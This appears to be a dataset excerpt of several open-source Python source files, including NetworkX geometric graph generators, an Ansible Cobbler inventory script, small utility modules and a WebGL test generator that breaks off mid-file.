repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
AyoubZahid/odoo | refs/heads/9.0 | addons/website_sale_stock/controllers/__init__.py | 7372 | import main
|
liangazhou/django-rdp | refs/heads/master | packages/Django-1.8.6/build/lib/django/conf/locale/kn/formats.py | 619 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals

# Date/time format definitions for the Kannada ("kn") locale, per the module
# path — TODO confirm against Django's locale registry.
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'h:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'j M Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =

# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
# DECIMAL_SEPARATOR =
# THOUSAND_SEPARATOR =
# NUMBER_GROUPING =
|
bgris/ODL_bgris | refs/heads/master | lib/python3.5/site-packages/skimage/measure/__init__.py | 8 | from ._find_contours import find_contours
from ._marching_cubes import (marching_cubes, mesh_surface_area,
correct_mesh_orientation)
from ._regionprops import regionprops, perimeter
from .simple_metrics import compare_mse, compare_nrmse, compare_psnr
from ._structural_similarity import compare_ssim, structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from ._pnpoly import points_in_poly, grid_points_in_poly
from ._moments import moments, moments_central, moments_normalized, moments_hu
from .profile import profile_line
from .fit import LineModel, LineModelND, CircleModel, EllipseModel, ransac
from .block import block_reduce
from ._label import label
# Public names exported by ``from skimage.measure import *``.
# Keep this list in sync with the imports above.
__all__ = ['find_contours',
           'regionprops',
           'perimeter',
           'approximate_polygon',
           'subdivide_polygon',
           'LineModel',
           'LineModelND',
           'CircleModel',
           'EllipseModel',
           'ransac',
           'block_reduce',
           'moments',
           'moments_central',
           'moments_normalized',
           'moments_hu',
           'marching_cubes',
           'mesh_surface_area',
           'correct_mesh_orientation',
           'profile_line',
           'label',
           'points_in_poly',
           'grid_points_in_poly',
           'structural_similarity',
           'compare_ssim',
           'compare_mse',
           'compare_nrmse',
           'compare_psnr',
           ]
|
cogeorg/BlackRhino | refs/heads/master | examples/firesales_simple/networkx/generators/geometric.py | 30 | # -*- coding: utf-8 -*-
"""
Generators for geometric graphs.
"""
# Copyright (C) 2004-2011 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
from __future__ import print_function
__author__ = "\n".join(['Aric Hagberg (hagberg@lanl.gov)',
'Dan Schult (dschult@colgate.edu)',
'Ben Edwards (BJEdwards@gmail.com)'])
__all__ = ['random_geometric_graph',
'waxman_graph',
'geographical_threshold_graph',
'navigable_small_world_graph']
from bisect import bisect_left
from functools import reduce
from itertools import product
import math, random, sys
import networkx as nx
#---------------------------------------------------------------------------
# Random Geometric Graphs
#---------------------------------------------------------------------------
def random_geometric_graph(n, radius, dim=2, pos=None):
    r"""Return the random geometric graph in the unit cube.

    The random geometric graph model places n nodes uniformly at random
    in the unit cube.  Two nodes `u,v` are connected with an edge if
    `d(u,v)<=r` where `d` is the Euclidean distance and `r` is a radius
    threshold.

    Parameters
    ----------
    n : int
        Number of nodes
    radius: float
        Distance threshold value
    dim : int, optional
        Dimension of graph
    pos : dict, optional
        A dictionary keyed by node with node positions as values.

    Returns
    -------
    Graph

    Examples
    --------
    >>> G = nx.random_geometric_graph(20,0.1)

    Notes
    -----
    This uses an `n^2` algorithm to build the graph.  A faster algorithm
    is possible using k-d trees.

    The pos keyword can be used to specify node positions so you can create
    an arbitrary distribution and domain for positions.  If you need a
    distance function other than Euclidean you'll have to hack the algorithm.

    E.g to use a 2d Gaussian distribution of node positions with mean (0,0)
    and std. dev. 2

    >>> import random
    >>> n=20
    >>> p=dict((i,(random.gauss(0,2),random.gauss(0,2))) for i in range(n))
    >>> G = nx.random_geometric_graph(n,0.2,pos=p)

    References
    ----------
    .. [1] Penrose, Mathew, Random Geometric Graphs,
       Oxford Studies in Probability, 5, 2003.
    """
    G = nx.Graph()
    G.name = "Random Geometric Graph"
    G.add_nodes_from(range(n))
    if pos is None:
        # Draw uniform random positions in [0, 1)^dim.  Use a distinct loop
        # variable: the original iterated ``for n in G`` and clobbered the
        # parameter ``n``.
        for node in G:
            G.node[node]['pos'] = [random.random() for i in range(dim)]
    else:
        nx.set_node_attributes(G, 'pos', pos)
    # connect nodes within "radius" of each other
    # n^2 pairwise scan (a k-d tree would be faster); compare squared
    # distances so no sqrt is needed.
    nodes = G.nodes(data=True)
    while nodes:
        u, du = nodes.pop()
        pu = du['pos']
        for v, dv in nodes:
            pv = dv['pos']
            d = sum(((a - b) ** 2 for a, b in zip(pu, pv)))
            if d <= radius ** 2:
                G.add_edge(u, v)
    return G
def geographical_threshold_graph(n, theta, alpha=2, dim=2,
                                 pos=None, weight=None):
    r"""Return a geographical threshold graph.

    The geographical threshold graph model places n nodes uniformly at
    random in a rectangular domain.  Each node `u` is assigned a weight
    `w_u`.  Two nodes `u,v` are connected with an edge if

    .. math::

       w_u + w_v \ge \theta r^{\alpha}

    where `r` is the Euclidean distance between `u` and `v`,
    and `\theta`, `\alpha` are parameters.

    Parameters
    ----------
    n : int
        Number of nodes
    theta: float
        Threshold value
    alpha: float, optional
        Exponent of distance function
    dim : int, optional
        Dimension of graph
    pos : dict
        Node positions as a dictionary of tuples keyed by node.
    weight : dict
        Node weights as a dictionary of numbers keyed by node.

    Returns
    -------
    Graph

    Examples
    --------
    >>> G = nx.geographical_threshold_graph(20,50)

    Notes
    -----
    If weights are not specified they are assigned to nodes by drawing
    randomly from the exponential distribution with rate parameter
    `\lambda=1`.  To specify weights from a different distribution assign
    them to a dictionary and pass it as the weight= keyword

    >>> import random
    >>> n = 20
    >>> w=dict((i,random.expovariate(5.0)) for i in range(n))
    >>> G = nx.geographical_threshold_graph(20,50,weight=w)

    If node positions are not specified they are randomly assigned from the
    uniform distribution.

    References
    ----------
    .. [1] Masuda, N., Miwa, H., Konno, N.:
       Geographical threshold graphs with small-world and scale-free properties.
       Physical Review E 71, 036108 (2005)
    .. [2] Milan Bradonjić, Aric Hagberg and Allon G. Percus,
       Giant component and connectivity in geographical threshold graphs,
       in Algorithms and Models for the Web-Graph (WAW 2007),
       Antony Bonato and Fan Chung (Eds), pp. 209--216, 2007
    """
    G = nx.Graph()
    # add n nodes
    G.add_nodes_from(range(n))
    if weight is None:
        # Default: i.i.d. exponential(1) weights.  Use a distinct loop
        # variable: the original iterated ``for n in G`` and clobbered the
        # parameter ``n``.
        for node in G:
            G.node[node]['weight'] = random.expovariate(1.0)
    else:
        nx.set_node_attributes(G, 'weight', weight)
    if pos is None:
        # Default: uniform random positions in [0, 1)^dim.
        for node in G:
            G.node[node]['pos'] = [random.random() for i in range(dim)]
    else:
        nx.set_node_attributes(G, 'pos', pos)
    G.add_edges_from(geographical_threshold_edges(G, theta, alpha))
    return G
def geographical_threshold_edges(G, theta, alpha=2):
    """Yield the edges of a geographical threshold graph.

    Expects every node of *G* to carry 'pos' and 'weight' attributes.  A
    pair ``(u, v)`` is yielded when ``w_u + w_v >= theta * r**alpha`` with
    ``r`` the Euclidean distance between the two positions.
    """
    candidates = G.nodes(data=True)
    # Pop one endpoint at a time and test it against all remaining nodes,
    # so each unordered pair is examined exactly once.
    while candidates:
        u, attrs_u = candidates.pop()
        weight_u = attrs_u['weight']
        pos_u = attrs_u['pos']
        for v, attrs_v in candidates:
            pos_v = attrs_v['pos']
            dist = math.sqrt(sum((a - b) ** 2 for a, b in zip(pos_u, pos_v)))
            if weight_u + attrs_v['weight'] >= theta * dist ** alpha:
                yield (u, v)
def waxman_graph(n, alpha=0.4, beta=0.1, L=None, domain=(0,0,1,1)):
    r"""Return a Waxman random graph.

    The Waxman random graph models place n nodes uniformly at random
    in a rectangular domain. Two nodes u,v are connected with an edge
    with probability

    .. math::
            p = \alpha*exp(-d/(\beta*L)).

    This function implements both Waxman models.

    Waxman-1: `L` not specified
        The distance `d` is the Euclidean distance between the nodes u and v.
        `L` is the maximum distance between all nodes in the graph.

    Waxman-2: `L` specified
        The distance `d` is chosen randomly in `[0,L]`.

    Parameters
    ----------
    n : int
        Number of nodes
    alpha: float
        Model parameter
    beta: float
        Model parameter
    L : float, optional
        Maximum distance between nodes.  If not specified the actual distance
        is calculated.
    domain : tuple of numbers, optional
        Domain size (xmin, ymin, xmax, ymax)

    Returns
    -------
    G: Graph

    References
    ----------
    .. [1] B. M. Waxman, Routing of multipoint connections.
       IEEE J. Select. Areas Commun. 6(9),(1988) 1617-1622.
    """
    # build graph of n nodes with random positions in the domain rectangle
    G = nx.Graph()
    G.add_nodes_from(range(n))
    (xmin, ymin, xmax, ymax) = domain
    for node in G:
        # BUG FIX: the original computed (xmin + (xmax-xmin))*random.random(),
        # i.e. uniform over [0, xmax), silently ignoring xmin/ymin.  Positions
        # must be uniform over [xmin, xmax) x [ymin, ymax).  (Also renamed the
        # loop variable, which used to clobber the parameter ``n``.)
        G.node[node]['pos'] = (xmin + (xmax - xmin) * random.random(),
                               ymin + (ymax - ymin) * random.random())
    if L is None:
        # Waxman-1: find maximum distance L between two nodes.  Track the
        # squared distance and take one sqrt at the end.
        l = 0
        pos = list(nx.get_node_attributes(G, 'pos').values())
        while pos:
            x1, y1 = pos.pop()
            for x2, y2 in pos:
                r2 = (x1 - x2) ** 2 + (y1 - y2) ** 2
                if r2 > l:
                    l = r2
        l = math.sqrt(l)
    else:
        # user specified maximum distance
        l = L
    nodes = G.nodes()
    if L is None:
        # Waxman-1 model
        # try all pairs, connect randomly based on euclidean distance
        while nodes:
            u = nodes.pop()
            x1, y1 = G.node[u]['pos']
            for v in nodes:
                x2, y2 = G.node[v]['pos']
                r = math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)
                if random.random() < alpha * math.exp(-r / (beta * l)):
                    G.add_edge(u, v)
    else:
        # Waxman-2 model
        # try all pairs, connect randomly based on randomly chosen l
        while nodes:
            u = nodes.pop()
            for v in nodes:
                r = random.random() * l
                if random.random() < alpha * math.exp(-r / (beta * l)):
                    G.add_edge(u, v)
    return G
def navigable_small_world_graph(n, p=1, q=1, r=2, dim=2, seed=None):
    r"""Return a navigable small-world graph.

    A navigable small-world graph is a directed grid with additional
    long-range connections that are chosen randomly.  From [1]_:

    Begin with a set of nodes that are identified with the set of lattice
    points in an `n \times n` square,
    `{(i,j): i\in {1,2,\ldots,n}, j\in {1,2,\ldots,n}}`
    and define the lattice distance between two nodes `(i,j)` and `(k,l)`
    to be the number of "lattice steps" separating them:
    `d((i,j),(k,l)) = |k-i|+|l-j|`.

    For a universal constant `p`, the node `u` has a directed edge to every
    other node within lattice distance `p` (local contacts).

    For universal constants `q\ge 0` and `r\ge 0` construct directed edges
    from `u` to `q` other nodes (long-range contacts) using independent
    random trials; the i'th directed edge from `u` has endpoint `v` with
    probability proportional to `d(u,v)^{-r}`.

    Parameters
    ----------
    n : int
        The number of nodes.
    p : int
        The diameter of short range connections. Each node is connected
        to every other node within lattice distance p.
    q : int
        The number of long-range connections for each node.
    r : float
        Exponent for decaying probability of connections.  The probability of
        connecting to a node at lattice distance d is 1/d^r.
    dim : int
        Dimension of grid
    seed : int, optional
        Seed for random number generator (default=None).

    References
    ----------
    .. [1] J. Kleinberg. The small-world phenomenon: An algorithmic
       perspective. Proc. 32nd ACM Symposium on Theory of Computing, 2000.
    """
    if p < 1:
        raise nx.NetworkXException("p must be >= 1")
    if q < 0:
        raise nx.NetworkXException("q must be >= 0")
    if r < 0:
        # BUG FIX: the guard is r < 0, but the original message claimed
        # "r must be >= 1".
        raise nx.NetworkXException("r must be >= 0")
    if seed is not None:
        random.seed(seed)
    G = nx.DiGraph()
    nodes = list(product(range(n), repeat=dim))
    for p1 in nodes:
        # probs[0] = 0 is a sentinel so bisect_left never returns index -1;
        # every other node contributes weight d**-r to the long-range CDF.
        probs = [0]
        for p2 in nodes:
            if p1 == p2:
                continue
            d = sum(abs(b - a) for a, b in zip(p1, p2))
            if d <= p:
                G.add_edge(p1, p2)
            probs.append(d ** -r)
        cdf = list(nx.utils.cumulative_sum(probs))
        for _ in range(q):
            target = nodes[bisect_left(cdf, random.uniform(0, cdf[-1]))]
            G.add_edge(p1, target)
    return G
|
sx-ruan/BEESEM | refs/heads/master | toolbox/basic.py | 2 | # coding: utf-8
import itertools as itt
import numpy as np
def Col(array):
    """Return *array* reshaped into a single column.

    :param array: array_like
    :return: ndarray

    >>> Col([0, 1])
    array([[0],
           [1]])
    """
    return np.asarray(array).reshape(-1, 1)
def Flip(dictionary):
    """Return a new dict with keys and values swapped.

    Values must be hashable; duplicate values collapse to one key.
    Uses ``items()`` instead of the Python-2-only ``iteritems()`` so the
    helper works on both Python 2 and 3.

    :param dictionary: dict
    :return: dict

    >>> Flip({1: 2})
    {2: 1}
    """
    return dict((v, k) for k, v in dictionary.items())
def Product(string, repeat):
    """Return all length-*repeat* strings over the characters of *string*.

    :param string: str
    :param repeat: int
    :return: list[str]

    >>> Product('ab', 2)
    ['aa', 'ab', 'ba', 'bb']
    """
    return list(map(''.join, itt.product(string, repeat=repeat)))
def Subset(array, length):
    """Return every contiguous slice of *array* of the given *length*.

    :param array: array_like
    :param length: int
    :return: list

    >>> Subset('abcd', 3)
    ['abc', 'bcd']
    >>> Subset([1, 2], 3)
    Traceback (most recent call last):
    ...
    AssertionError
    """
    count = len(array) - length + 1
    assert count > 0
    return [array[start:start + length] for start in range(count)]
def Outer(*iterables):
    """Return the flattened outer product of the given iterables.

    :param iterables: list[iterable]
    :return: list[Number]

    >>> Outer([1, 2], [3, 4])
    [3, 4, 6, 8]
    """
    return list(map(np.prod, itt.product(*iterables)))
def Id(x):
    """Identity function: return *x* unchanged.

    :param x: object
    :return: object
    """
    return x
def Group(iterable, size=1):
    """Group consecutive items of *iterable* into tuples of *size* items.

    Incomplete trailing groups are dropped (zip semantics).  Uses the
    built-in ``zip`` instead of the Python-2-only ``itertools.izip`` so the
    helper works on both Python 2 and 3.

    :param iterable: iterable
    :param size: int
    :return: iterator

    >>> list(Group([1, 2]))
    [(1,), (2,)]
    >>> list(Group([1, 2], 2))
    [(1, 2)]
    """
    # The same iterator repeated ``size`` times makes zip consume items in
    # consecutive, non-overlapping chunks.
    iters = [iter(iterable)] * size
    return zip(*iters)
def In(x, y):
    """Test membership of *x* in *y* using numpy's containment semantics.

    :param x: array_like
    :param y: array_like
    :return: bool

    >>> In(1, [2, 3])
    False
    >>> In(1, 1)
    True
    """
    haystack = np.array(y)
    return x in haystack
def KL(x, y):
    """
    Calculate the Kullback-Leibler divergence D(p || q).

    Both inputs are normalized to probability distributions first; every
    entry must be strictly positive.

    :param x: iterable
    :param y: iterable
    :return: float

    >>> KL([1, 2], [-3, 4])
    Traceback (most recent call last):
    ...
    AssertionError
    """
    p, q = (np.fromiter(values, float) for values in (x, y))
    assert min(p) > 0 and min(q) > 0
    p /= sum(p)
    q /= sum(q)
    return p.dot(np.log(p / q))
if __name__ == '__main__':
import doctest
doctest.testmod()
|
saurabh6790/omnitech-app | refs/heads/master | patches/october_2013/p07_rename_for_territory.py | 30 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes, os
def execute():
    """Patch: rename DocType 'For Territory' to 'Applicable Territory'.

    Idempotent — skips the rename when the target table already exists and
    only deletes the old DocType when it is still present.
    NOTE(review): indentation of this patch was reconstructed; the rename is
    assumed to be the only statement guarded by the table check — confirm
    against the original repository.
    """
    from webnotes.utils import get_base_path
    import shutil
    # Reload the DocType meta-schema first so the rename machinery is current.
    webnotes.reload_doc("core", "doctype", "doctype")
    tables = webnotes.conn.sql_list("show tables")
    # Only rename if the patch has not already run (target table absent).
    if "tabApplicable Territory" not in tables:
        webnotes.rename_doc("DocType", "For Territory", "Applicable Territory", force=True)
    webnotes.reload_doc("setup", "doctype", "applicable_territory")
    # Remove the old doctype's module folder from disk, if it still exists.
    path = os.path.join(get_base_path(), "app", "setup", "doctype", "for_territory")
    if os.path.exists(path):
        shutil.rmtree(path)
    # Drop the old DocType record itself, if still present.
    if webnotes.conn.exists("DocType", "For Territory"):
        webnotes.delete_doc("DocType", "For Territory")
|
rosmo/ansible | refs/heads/devel | contrib/inventory/cobbler.py | 32 | #!/usr/bin/env python
"""
Cobbler external inventory script
=================================
Ansible has a feature where instead of reading from /etc/ansible/hosts
as a text file, it can query external programs to obtain the list
of hosts, groups the hosts are in, and even variables to assign to each host.
To use this, copy this file over /etc/ansible/hosts and chmod +x the file.
This, more or less, allows you to keep one central database containing
info about all of your managed instances.
This script is an example of sourcing that data from Cobbler
(https://cobbler.github.io). With cobbler each --mgmt-class in cobbler
will correspond to a group in Ansible, and --ks-meta variables will be
passed down for use in templates or even in argument lines.
NOTE: The cobbler system names will not be used. Make sure a
cobbler --dns-name is set for each cobbler system. If a system
appears with two DNS names we do not add it twice because we don't want
ansible talking to it twice. The first one found will be used. If no
--dns-name is set the system will NOT be visible to ansible. We do
not add cobbler system names because there is no requirement in cobbler
that those correspond to addresses.
Tested with Cobbler 2.0.11.
Changelog:
- 2015-06-21 dmccue: Modified to support run-once _meta retrieval, results in
higher performance at ansible startup. Groups are determined by owner rather than
default mgmt_classes. DNS name determined from hostname. cobbler values are written
to a 'cobbler' fact namespace
- 2013-09-01 pgehres: Refactored implementation to make use of caching and to
limit the number of connections to external cobbler server for performance.
Added use of cobbler.ini file to configure settings. Tested with Cobbler 2.4.0
"""
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
######################################################################
import argparse
import os
import re
from time import time
import xmlrpclib
import json
from ansible.module_utils.six import iteritems
from ansible.module_utils.six.moves import configparser as ConfigParser
# NOTE -- this file assumes Ansible is being accessed FROM the cobbler
# server, so it does not attempt to login with a username and password.
# this will be addressed in a future version of this script.
orderby_keyname = 'owners' # alternatively 'mgmt_classes'
class CobblerInventory(object):
    """Build an Ansible dynamic inventory from a Cobbler server.

    Settings are read from environment variables and/or ``cobbler.ini``;
    systems are grouped by status, profile and ``orderby_keyname`` classes,
    and results are cached on disk between runs.
    """

    def __init__(self):
        """ Main execution path """
        self.conn = None

        self.inventory = dict()  # A list of groups and the hosts in that group
        self.cache = dict()  # Details about hosts in the inventory
        self.ignore_settings = False  # used to only look at env vars for settings.

        # Read env vars, read settings, and parse CLI arguments
        self.parse_env_vars()
        self.read_settings()
        self.parse_cli_args()

        # Cache
        if self.args.refresh_cache:
            self.update_cache()
        elif not self.is_cache_valid():
            self.update_cache()
        else:
            self.load_inventory_from_cache()
            self.load_cache_from_cache()

        data_to_print = ""

        # Data to print
        if self.args.host:
            data_to_print += self.get_host_info()
        else:
            self.inventory['_meta'] = {'hostvars': {}}
            for hostname in self.cache:
                self.inventory['_meta']['hostvars'][hostname] = {'cobbler': self.cache[hostname]}
            data_to_print += self.json_format_dict(self.inventory, True)

        print(data_to_print)

    def _connect(self):
        """Lazily open the XML-RPC connection (and log in when credentials exist)."""
        if not self.conn:
            self.conn = xmlrpclib.Server(self.cobbler_host, allow_none=True)
            self.token = None
            if self.cobbler_username is not None:
                self.token = self.conn.login(self.cobbler_username, self.cobbler_password)

    def is_cache_valid(self):
        """ Determines if the cache files have expired, or if it is still valid """

        if os.path.isfile(self.cache_path_cache):
            mod_time = os.path.getmtime(self.cache_path_cache)
            current_time = time()
            if (mod_time + self.cache_max_age) > current_time:
                if os.path.isfile(self.cache_path_inventory):
                    return True

        return False

    def read_settings(self):
        """ Reads the settings from the cobbler.ini file """

        if self.ignore_settings:
            return

        config = ConfigParser.SafeConfigParser()
        config.read(os.path.dirname(os.path.realpath(__file__)) + '/cobbler.ini')

        self.cobbler_host = config.get('cobbler', 'host')
        self.cobbler_username = None
        self.cobbler_password = None
        if config.has_option('cobbler', 'username'):
            self.cobbler_username = config.get('cobbler', 'username')
        if config.has_option('cobbler', 'password'):
            self.cobbler_password = config.get('cobbler', 'password')

        # Cache related
        cache_path = config.get('cobbler', 'cache_path')
        self.cache_path_cache = cache_path + "/ansible-cobbler.cache"
        self.cache_path_inventory = cache_path + "/ansible-cobbler.index"
        self.cache_max_age = config.getint('cobbler', 'cache_max_age')

    def parse_env_vars(self):
        """ Reads the settings from the environment """

        # Env. Vars:
        #   COBBLER_host
        #   COBBLER_username
        #   COBBLER_password
        #   COBBLER_cache_path
        #   COBBLER_cache_max_age
        #   COBBLER_ignore_settings
        self.cobbler_host = os.getenv('COBBLER_host', None)
        self.cobbler_username = os.getenv('COBBLER_username', None)
        self.cobbler_password = os.getenv('COBBLER_password', None)

        # Cache related
        cache_path = os.getenv('COBBLER_cache_path', None)
        if cache_path is not None:
            self.cache_path_cache = cache_path + "/ansible-cobbler.cache"
            self.cache_path_inventory = cache_path + "/ansible-cobbler.index"
        self.cache_max_age = int(os.getenv('COBBLER_cache_max_age', "30"))

        # ignore_settings is used to ignore the settings file, for use in Ansible
        # Tower (or AWX inventory scripts and not throw python exceptions.)
        if os.getenv('COBBLER_ignore_settings', False) == "True":
            self.ignore_settings = True

    def parse_cli_args(self):
        """ Command line argument processing """

        parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Cobbler')
        parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)')
        parser.add_argument('--host', action='store', help='Get all the variables about a specific instance')
        parser.add_argument('--refresh-cache', action='store_true', default=False,
                            help='Force refresh of cache by making API requests to cobbler (default: False - use cache files)')
        self.args = parser.parse_args()

    def update_cache(self):
        """ Make calls to cobbler and save the output in a cache """

        self._connect()
        self.groups = dict()
        self.hosts = dict()
        if self.token is not None:
            data = self.conn.get_systems(self.token)
        else:
            data = self.conn.get_systems()

        for host in data:
            # Get the FQDN for the host and add it to the right groups
            dns_name = host['hostname']  # None
            ksmeta = None
            interfaces = host['interfaces']
            # hostname is often empty for non-static IP hosts
            if dns_name == '':
                for (iname, ivalue) in iteritems(interfaces):
                    if ivalue['management'] or not ivalue['static']:
                        this_dns_name = ivalue.get('dns_name', None)
                        # BUG FIX: the original used ``is not ""`` — an
                        # identity comparison with a string literal that is
                        # effectively always True (and a SyntaxWarning on
                        # modern Python).  Use an equality check so empty
                        # dns_name values are really skipped.
                        # NOTE(review): the last matching interface wins here,
                        # although the module docstring says the first found
                        # is used — confirm intended behavior.
                        if this_dns_name is not None and this_dns_name != "":
                            dns_name = this_dns_name

            if dns_name == '' or dns_name is None:
                continue

            status = host['status']
            profile = host['profile']
            classes = host[orderby_keyname]

            if status not in self.inventory:
                self.inventory[status] = []
            self.inventory[status].append(dns_name)

            if profile not in self.inventory:
                self.inventory[profile] = []
            self.inventory[profile].append(dns_name)

            for cls in classes:
                if cls not in self.inventory:
                    self.inventory[cls] = []
                self.inventory[cls].append(dns_name)

            # Since we already have all of the data for the host, update the host details as well
            # The old way was ksmeta only -- provide backwards compatibility
            self.cache[dns_name] = host
            if "ks_meta" in host:
                for key, value in iteritems(host["ks_meta"]):
                    self.cache[dns_name][key] = value

        self.write_to_cache(self.cache, self.cache_path_cache)
        self.write_to_cache(self.inventory, self.cache_path_inventory)

    def get_host_info(self):
        """ Get variables about a specific host """

        if not self.cache or len(self.cache) == 0:
            # Need to load index from cache
            self.load_cache_from_cache()

        if self.args.host not in self.cache:
            # try updating the cache
            self.update_cache()

            if self.args.host not in self.cache:
                # host might not exist anymore
                return self.json_format_dict({}, True)

        return self.json_format_dict(self.cache[self.args.host], True)

    def push(self, my_dict, key, element):
        """ Pushed an element onto an array that may not have been defined in the dict """

        if key in my_dict:
            my_dict[key].append(element)
        else:
            my_dict[key] = [element]

    def load_inventory_from_cache(self):
        """ Reads the index from the cache file sets self.index """

        cache = open(self.cache_path_inventory, 'r')
        json_inventory = cache.read()
        self.inventory = json.loads(json_inventory)

    def load_cache_from_cache(self):
        """ Reads the cache from the cache file sets self.cache """

        cache = open(self.cache_path_cache, 'r')
        json_cache = cache.read()
        self.cache = json.loads(json_cache)

    def write_to_cache(self, data, filename):
        """ Writes data in JSON format to a file """
        json_data = self.json_format_dict(data, True)
        cache = open(filename, 'w')
        cache.write(json_data)
        cache.close()

    def to_safe(self, word):
        """ Converts 'bad' characters in a string to underscores so they can be used as Ansible groups """

        return re.sub(r"[^A-Za-z0-9\-]", "_", word)

    def json_format_dict(self, data, pretty=False):
        """ Converts a dict to a JSON object and dumps it as a formatted string """

        if pretty:
            return json.dumps(data, sort_keys=True, indent=2)
        else:
            return json.dumps(data)
CobblerInventory()
|
rahulgayatri23/moose-core | refs/heads/master | python/moose/optimizer_interface.py | 4 | # optimizer_interface.py ---
#
# Filename: optimizer_interface.py
# Description: Provides an interface between Optimizer and MOOSE
# Author: Viktor Toth
# Maintainer:
# Copyright (C) 2014 Viktor Toth, all rights reserved.
# Created: 7 Aug 14:45:30 2014 (+0530)
# Version: 1.0
# Last-Updated:
# URL:
# Keywords:
# Compatibility:
#
#
# Code:
import os
from . import moose
class OptimizerInterface:
    """
    Establish connection between MOOSE and Optimizer, parameter fitting tool.

    Usage: create an OptimizerInterface object at the beginning of the
    script running the MOOSE simulation. Call getParams() to retrieve
    the parameters advised by Optimizer, then run the simulation using
    these parameters. When the simulation has already run, call addTrace()
    passing every trace as a moose.Table or list of floats. When all the
    traces are added, call writeTraces() so when your script finished
    Optimizer is able to read these traces from traceFile.

    On the second 'layer' of the Optimizer GUI select external
    (as type of simulator) and type into the command text box:
    'python /path_to_your_model_script/script.py 3' if the number of
    parameters to fit is 3.
    """

    # Default file names (also used as the __init__ defaults below).
    paramFile = 'params.param'  # contains parameters, separated by newline
    traceFile = 'trace.dat'  # contains traces, TAB separated in columns

    def __init__(self, paramFile=paramFile, traceFile=traceFile):
        """
        Opens or creates paramFile and traceFile. Reads the parameters
        from paramFile if able to.
        """
        self.paramFile = paramFile
        self.traceFile = traceFile

        # BUG FIX: params/traces used to be mutable class attributes, so
        # every instance shared (and mutated) the same lists.  They are now
        # per-instance state.
        self.params = []
        self.traces = []

        # parameter file: read parameters if present, otherwise create it
        if os.path.isfile(self.paramFile):
            with open(self.paramFile) as f:
                self.params = [float(line) for line in f]
        else:
            open(self.paramFile, 'a').close()  # create file

        # trace file: create if missing
        if not os.path.isfile(self.traceFile):
            open(self.traceFile, 'a').close()  # create file

    def addTrace(self, trace):
        """
        A trace can be a moose.Table object or a list of float numbers.
        """
        if isinstance(trace, moose.Table):
            self.traces.append(trace.vec)
        else:
            self.traces.append(trace)

    def writeTraces(self):
        """
        Writes the content of traces to traceFile. Every column is a
        trace separated by TABs.
        """
        # All traces must have the same length (same sampling frequency);
        # interpolation is deliberately not implemented.
        assert len(self.traces) > 0 and len(self.traces[0]) > 0, 'No traces or empty trace found!'
        for i in range(1, len(self.traces)):
            assert len(self.traces[i - 1]) == len(self.traces[i]), 'All traces should have the same length! Use identical sampling frequency!'

        with open(self.traceFile, 'w') as f:
            for i in range(len(self.traces[0])):
                row = [str(trace[i]) for trace in self.traces]
                f.write('\t'.join(row) + '\n')

    def getParams(self):
        """
        Returns the list of parameters read from paramFile.
        """
        return self.params
|
endlessm/chromium-browser | refs/heads/master | third_party/webgl/src/sdk/tests/deqp/functional/gles3/primitiverestart/primitiverestart_test_generator.py | 6 | #!/usr/bin/env python
# Copyright (c) 2019 The Khronos Group Inc.
# Use of this source code is governed by an MIT-style license that can be
# found in the LICENSE.txt file.
"""
Generator for primitiverestart* tests.
This file needs to be run in its folder.
"""
import sys
_DO_NOT_EDIT_WARNING = """<!--
This file is auto-generated from primitiverestart_test_generator.py
DO NOT EDIT!
-->
"""
_HTML_TEMPLATE = """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>WebGL Primitive Restart Conformance Tests</title>
<link rel="stylesheet" href="../../../../resources/js-test-style.css"/>
<script src="../../../../js/js-test-pre.js"></script>
<script src="../../../../js/webgl-test-utils.js"></script>
<script src="../../../../closure-library/closure/goog/base.js"></script>
<script src="../../../deqp-deps.js"></script>
<script>goog.require('functional.gles3.es3fPrimitiveRestartTests');</script>
</head>
<body>
<div id="description"></div>
<div id="console"></div>
<canvas id="canvas" width="256" height="256"> </canvas>
<script>
var wtu = WebGLTestUtils;
var gl = wtu.create3DContext('canvas', null, 2);
functional.gles3.es3fPrimitiveRestartTests.run(gl, [%(start)s, %(end)s]);
</script>
</body>
</html>
"""
_NUM_TESTS = 8
def WriteTest(filename, start, end):
    """Write one generated HTML test covering the range [start, end)."""
    # BUG FIX: the original called ``file.close`` without parentheses, which
    # never closed the handle, and shadowed the ``file`` builtin; it also
    # opened in "wb" while writing str (a TypeError on Python 3).  A context
    # manager in text mode fixes all three.
    with open(filename, "w") as out:
        out.write(_DO_NOT_EDIT_WARNING)
        out.write(_HTML_TEMPLATE % {
            'start': start,
            'end': end
        })
def GenerateTests():
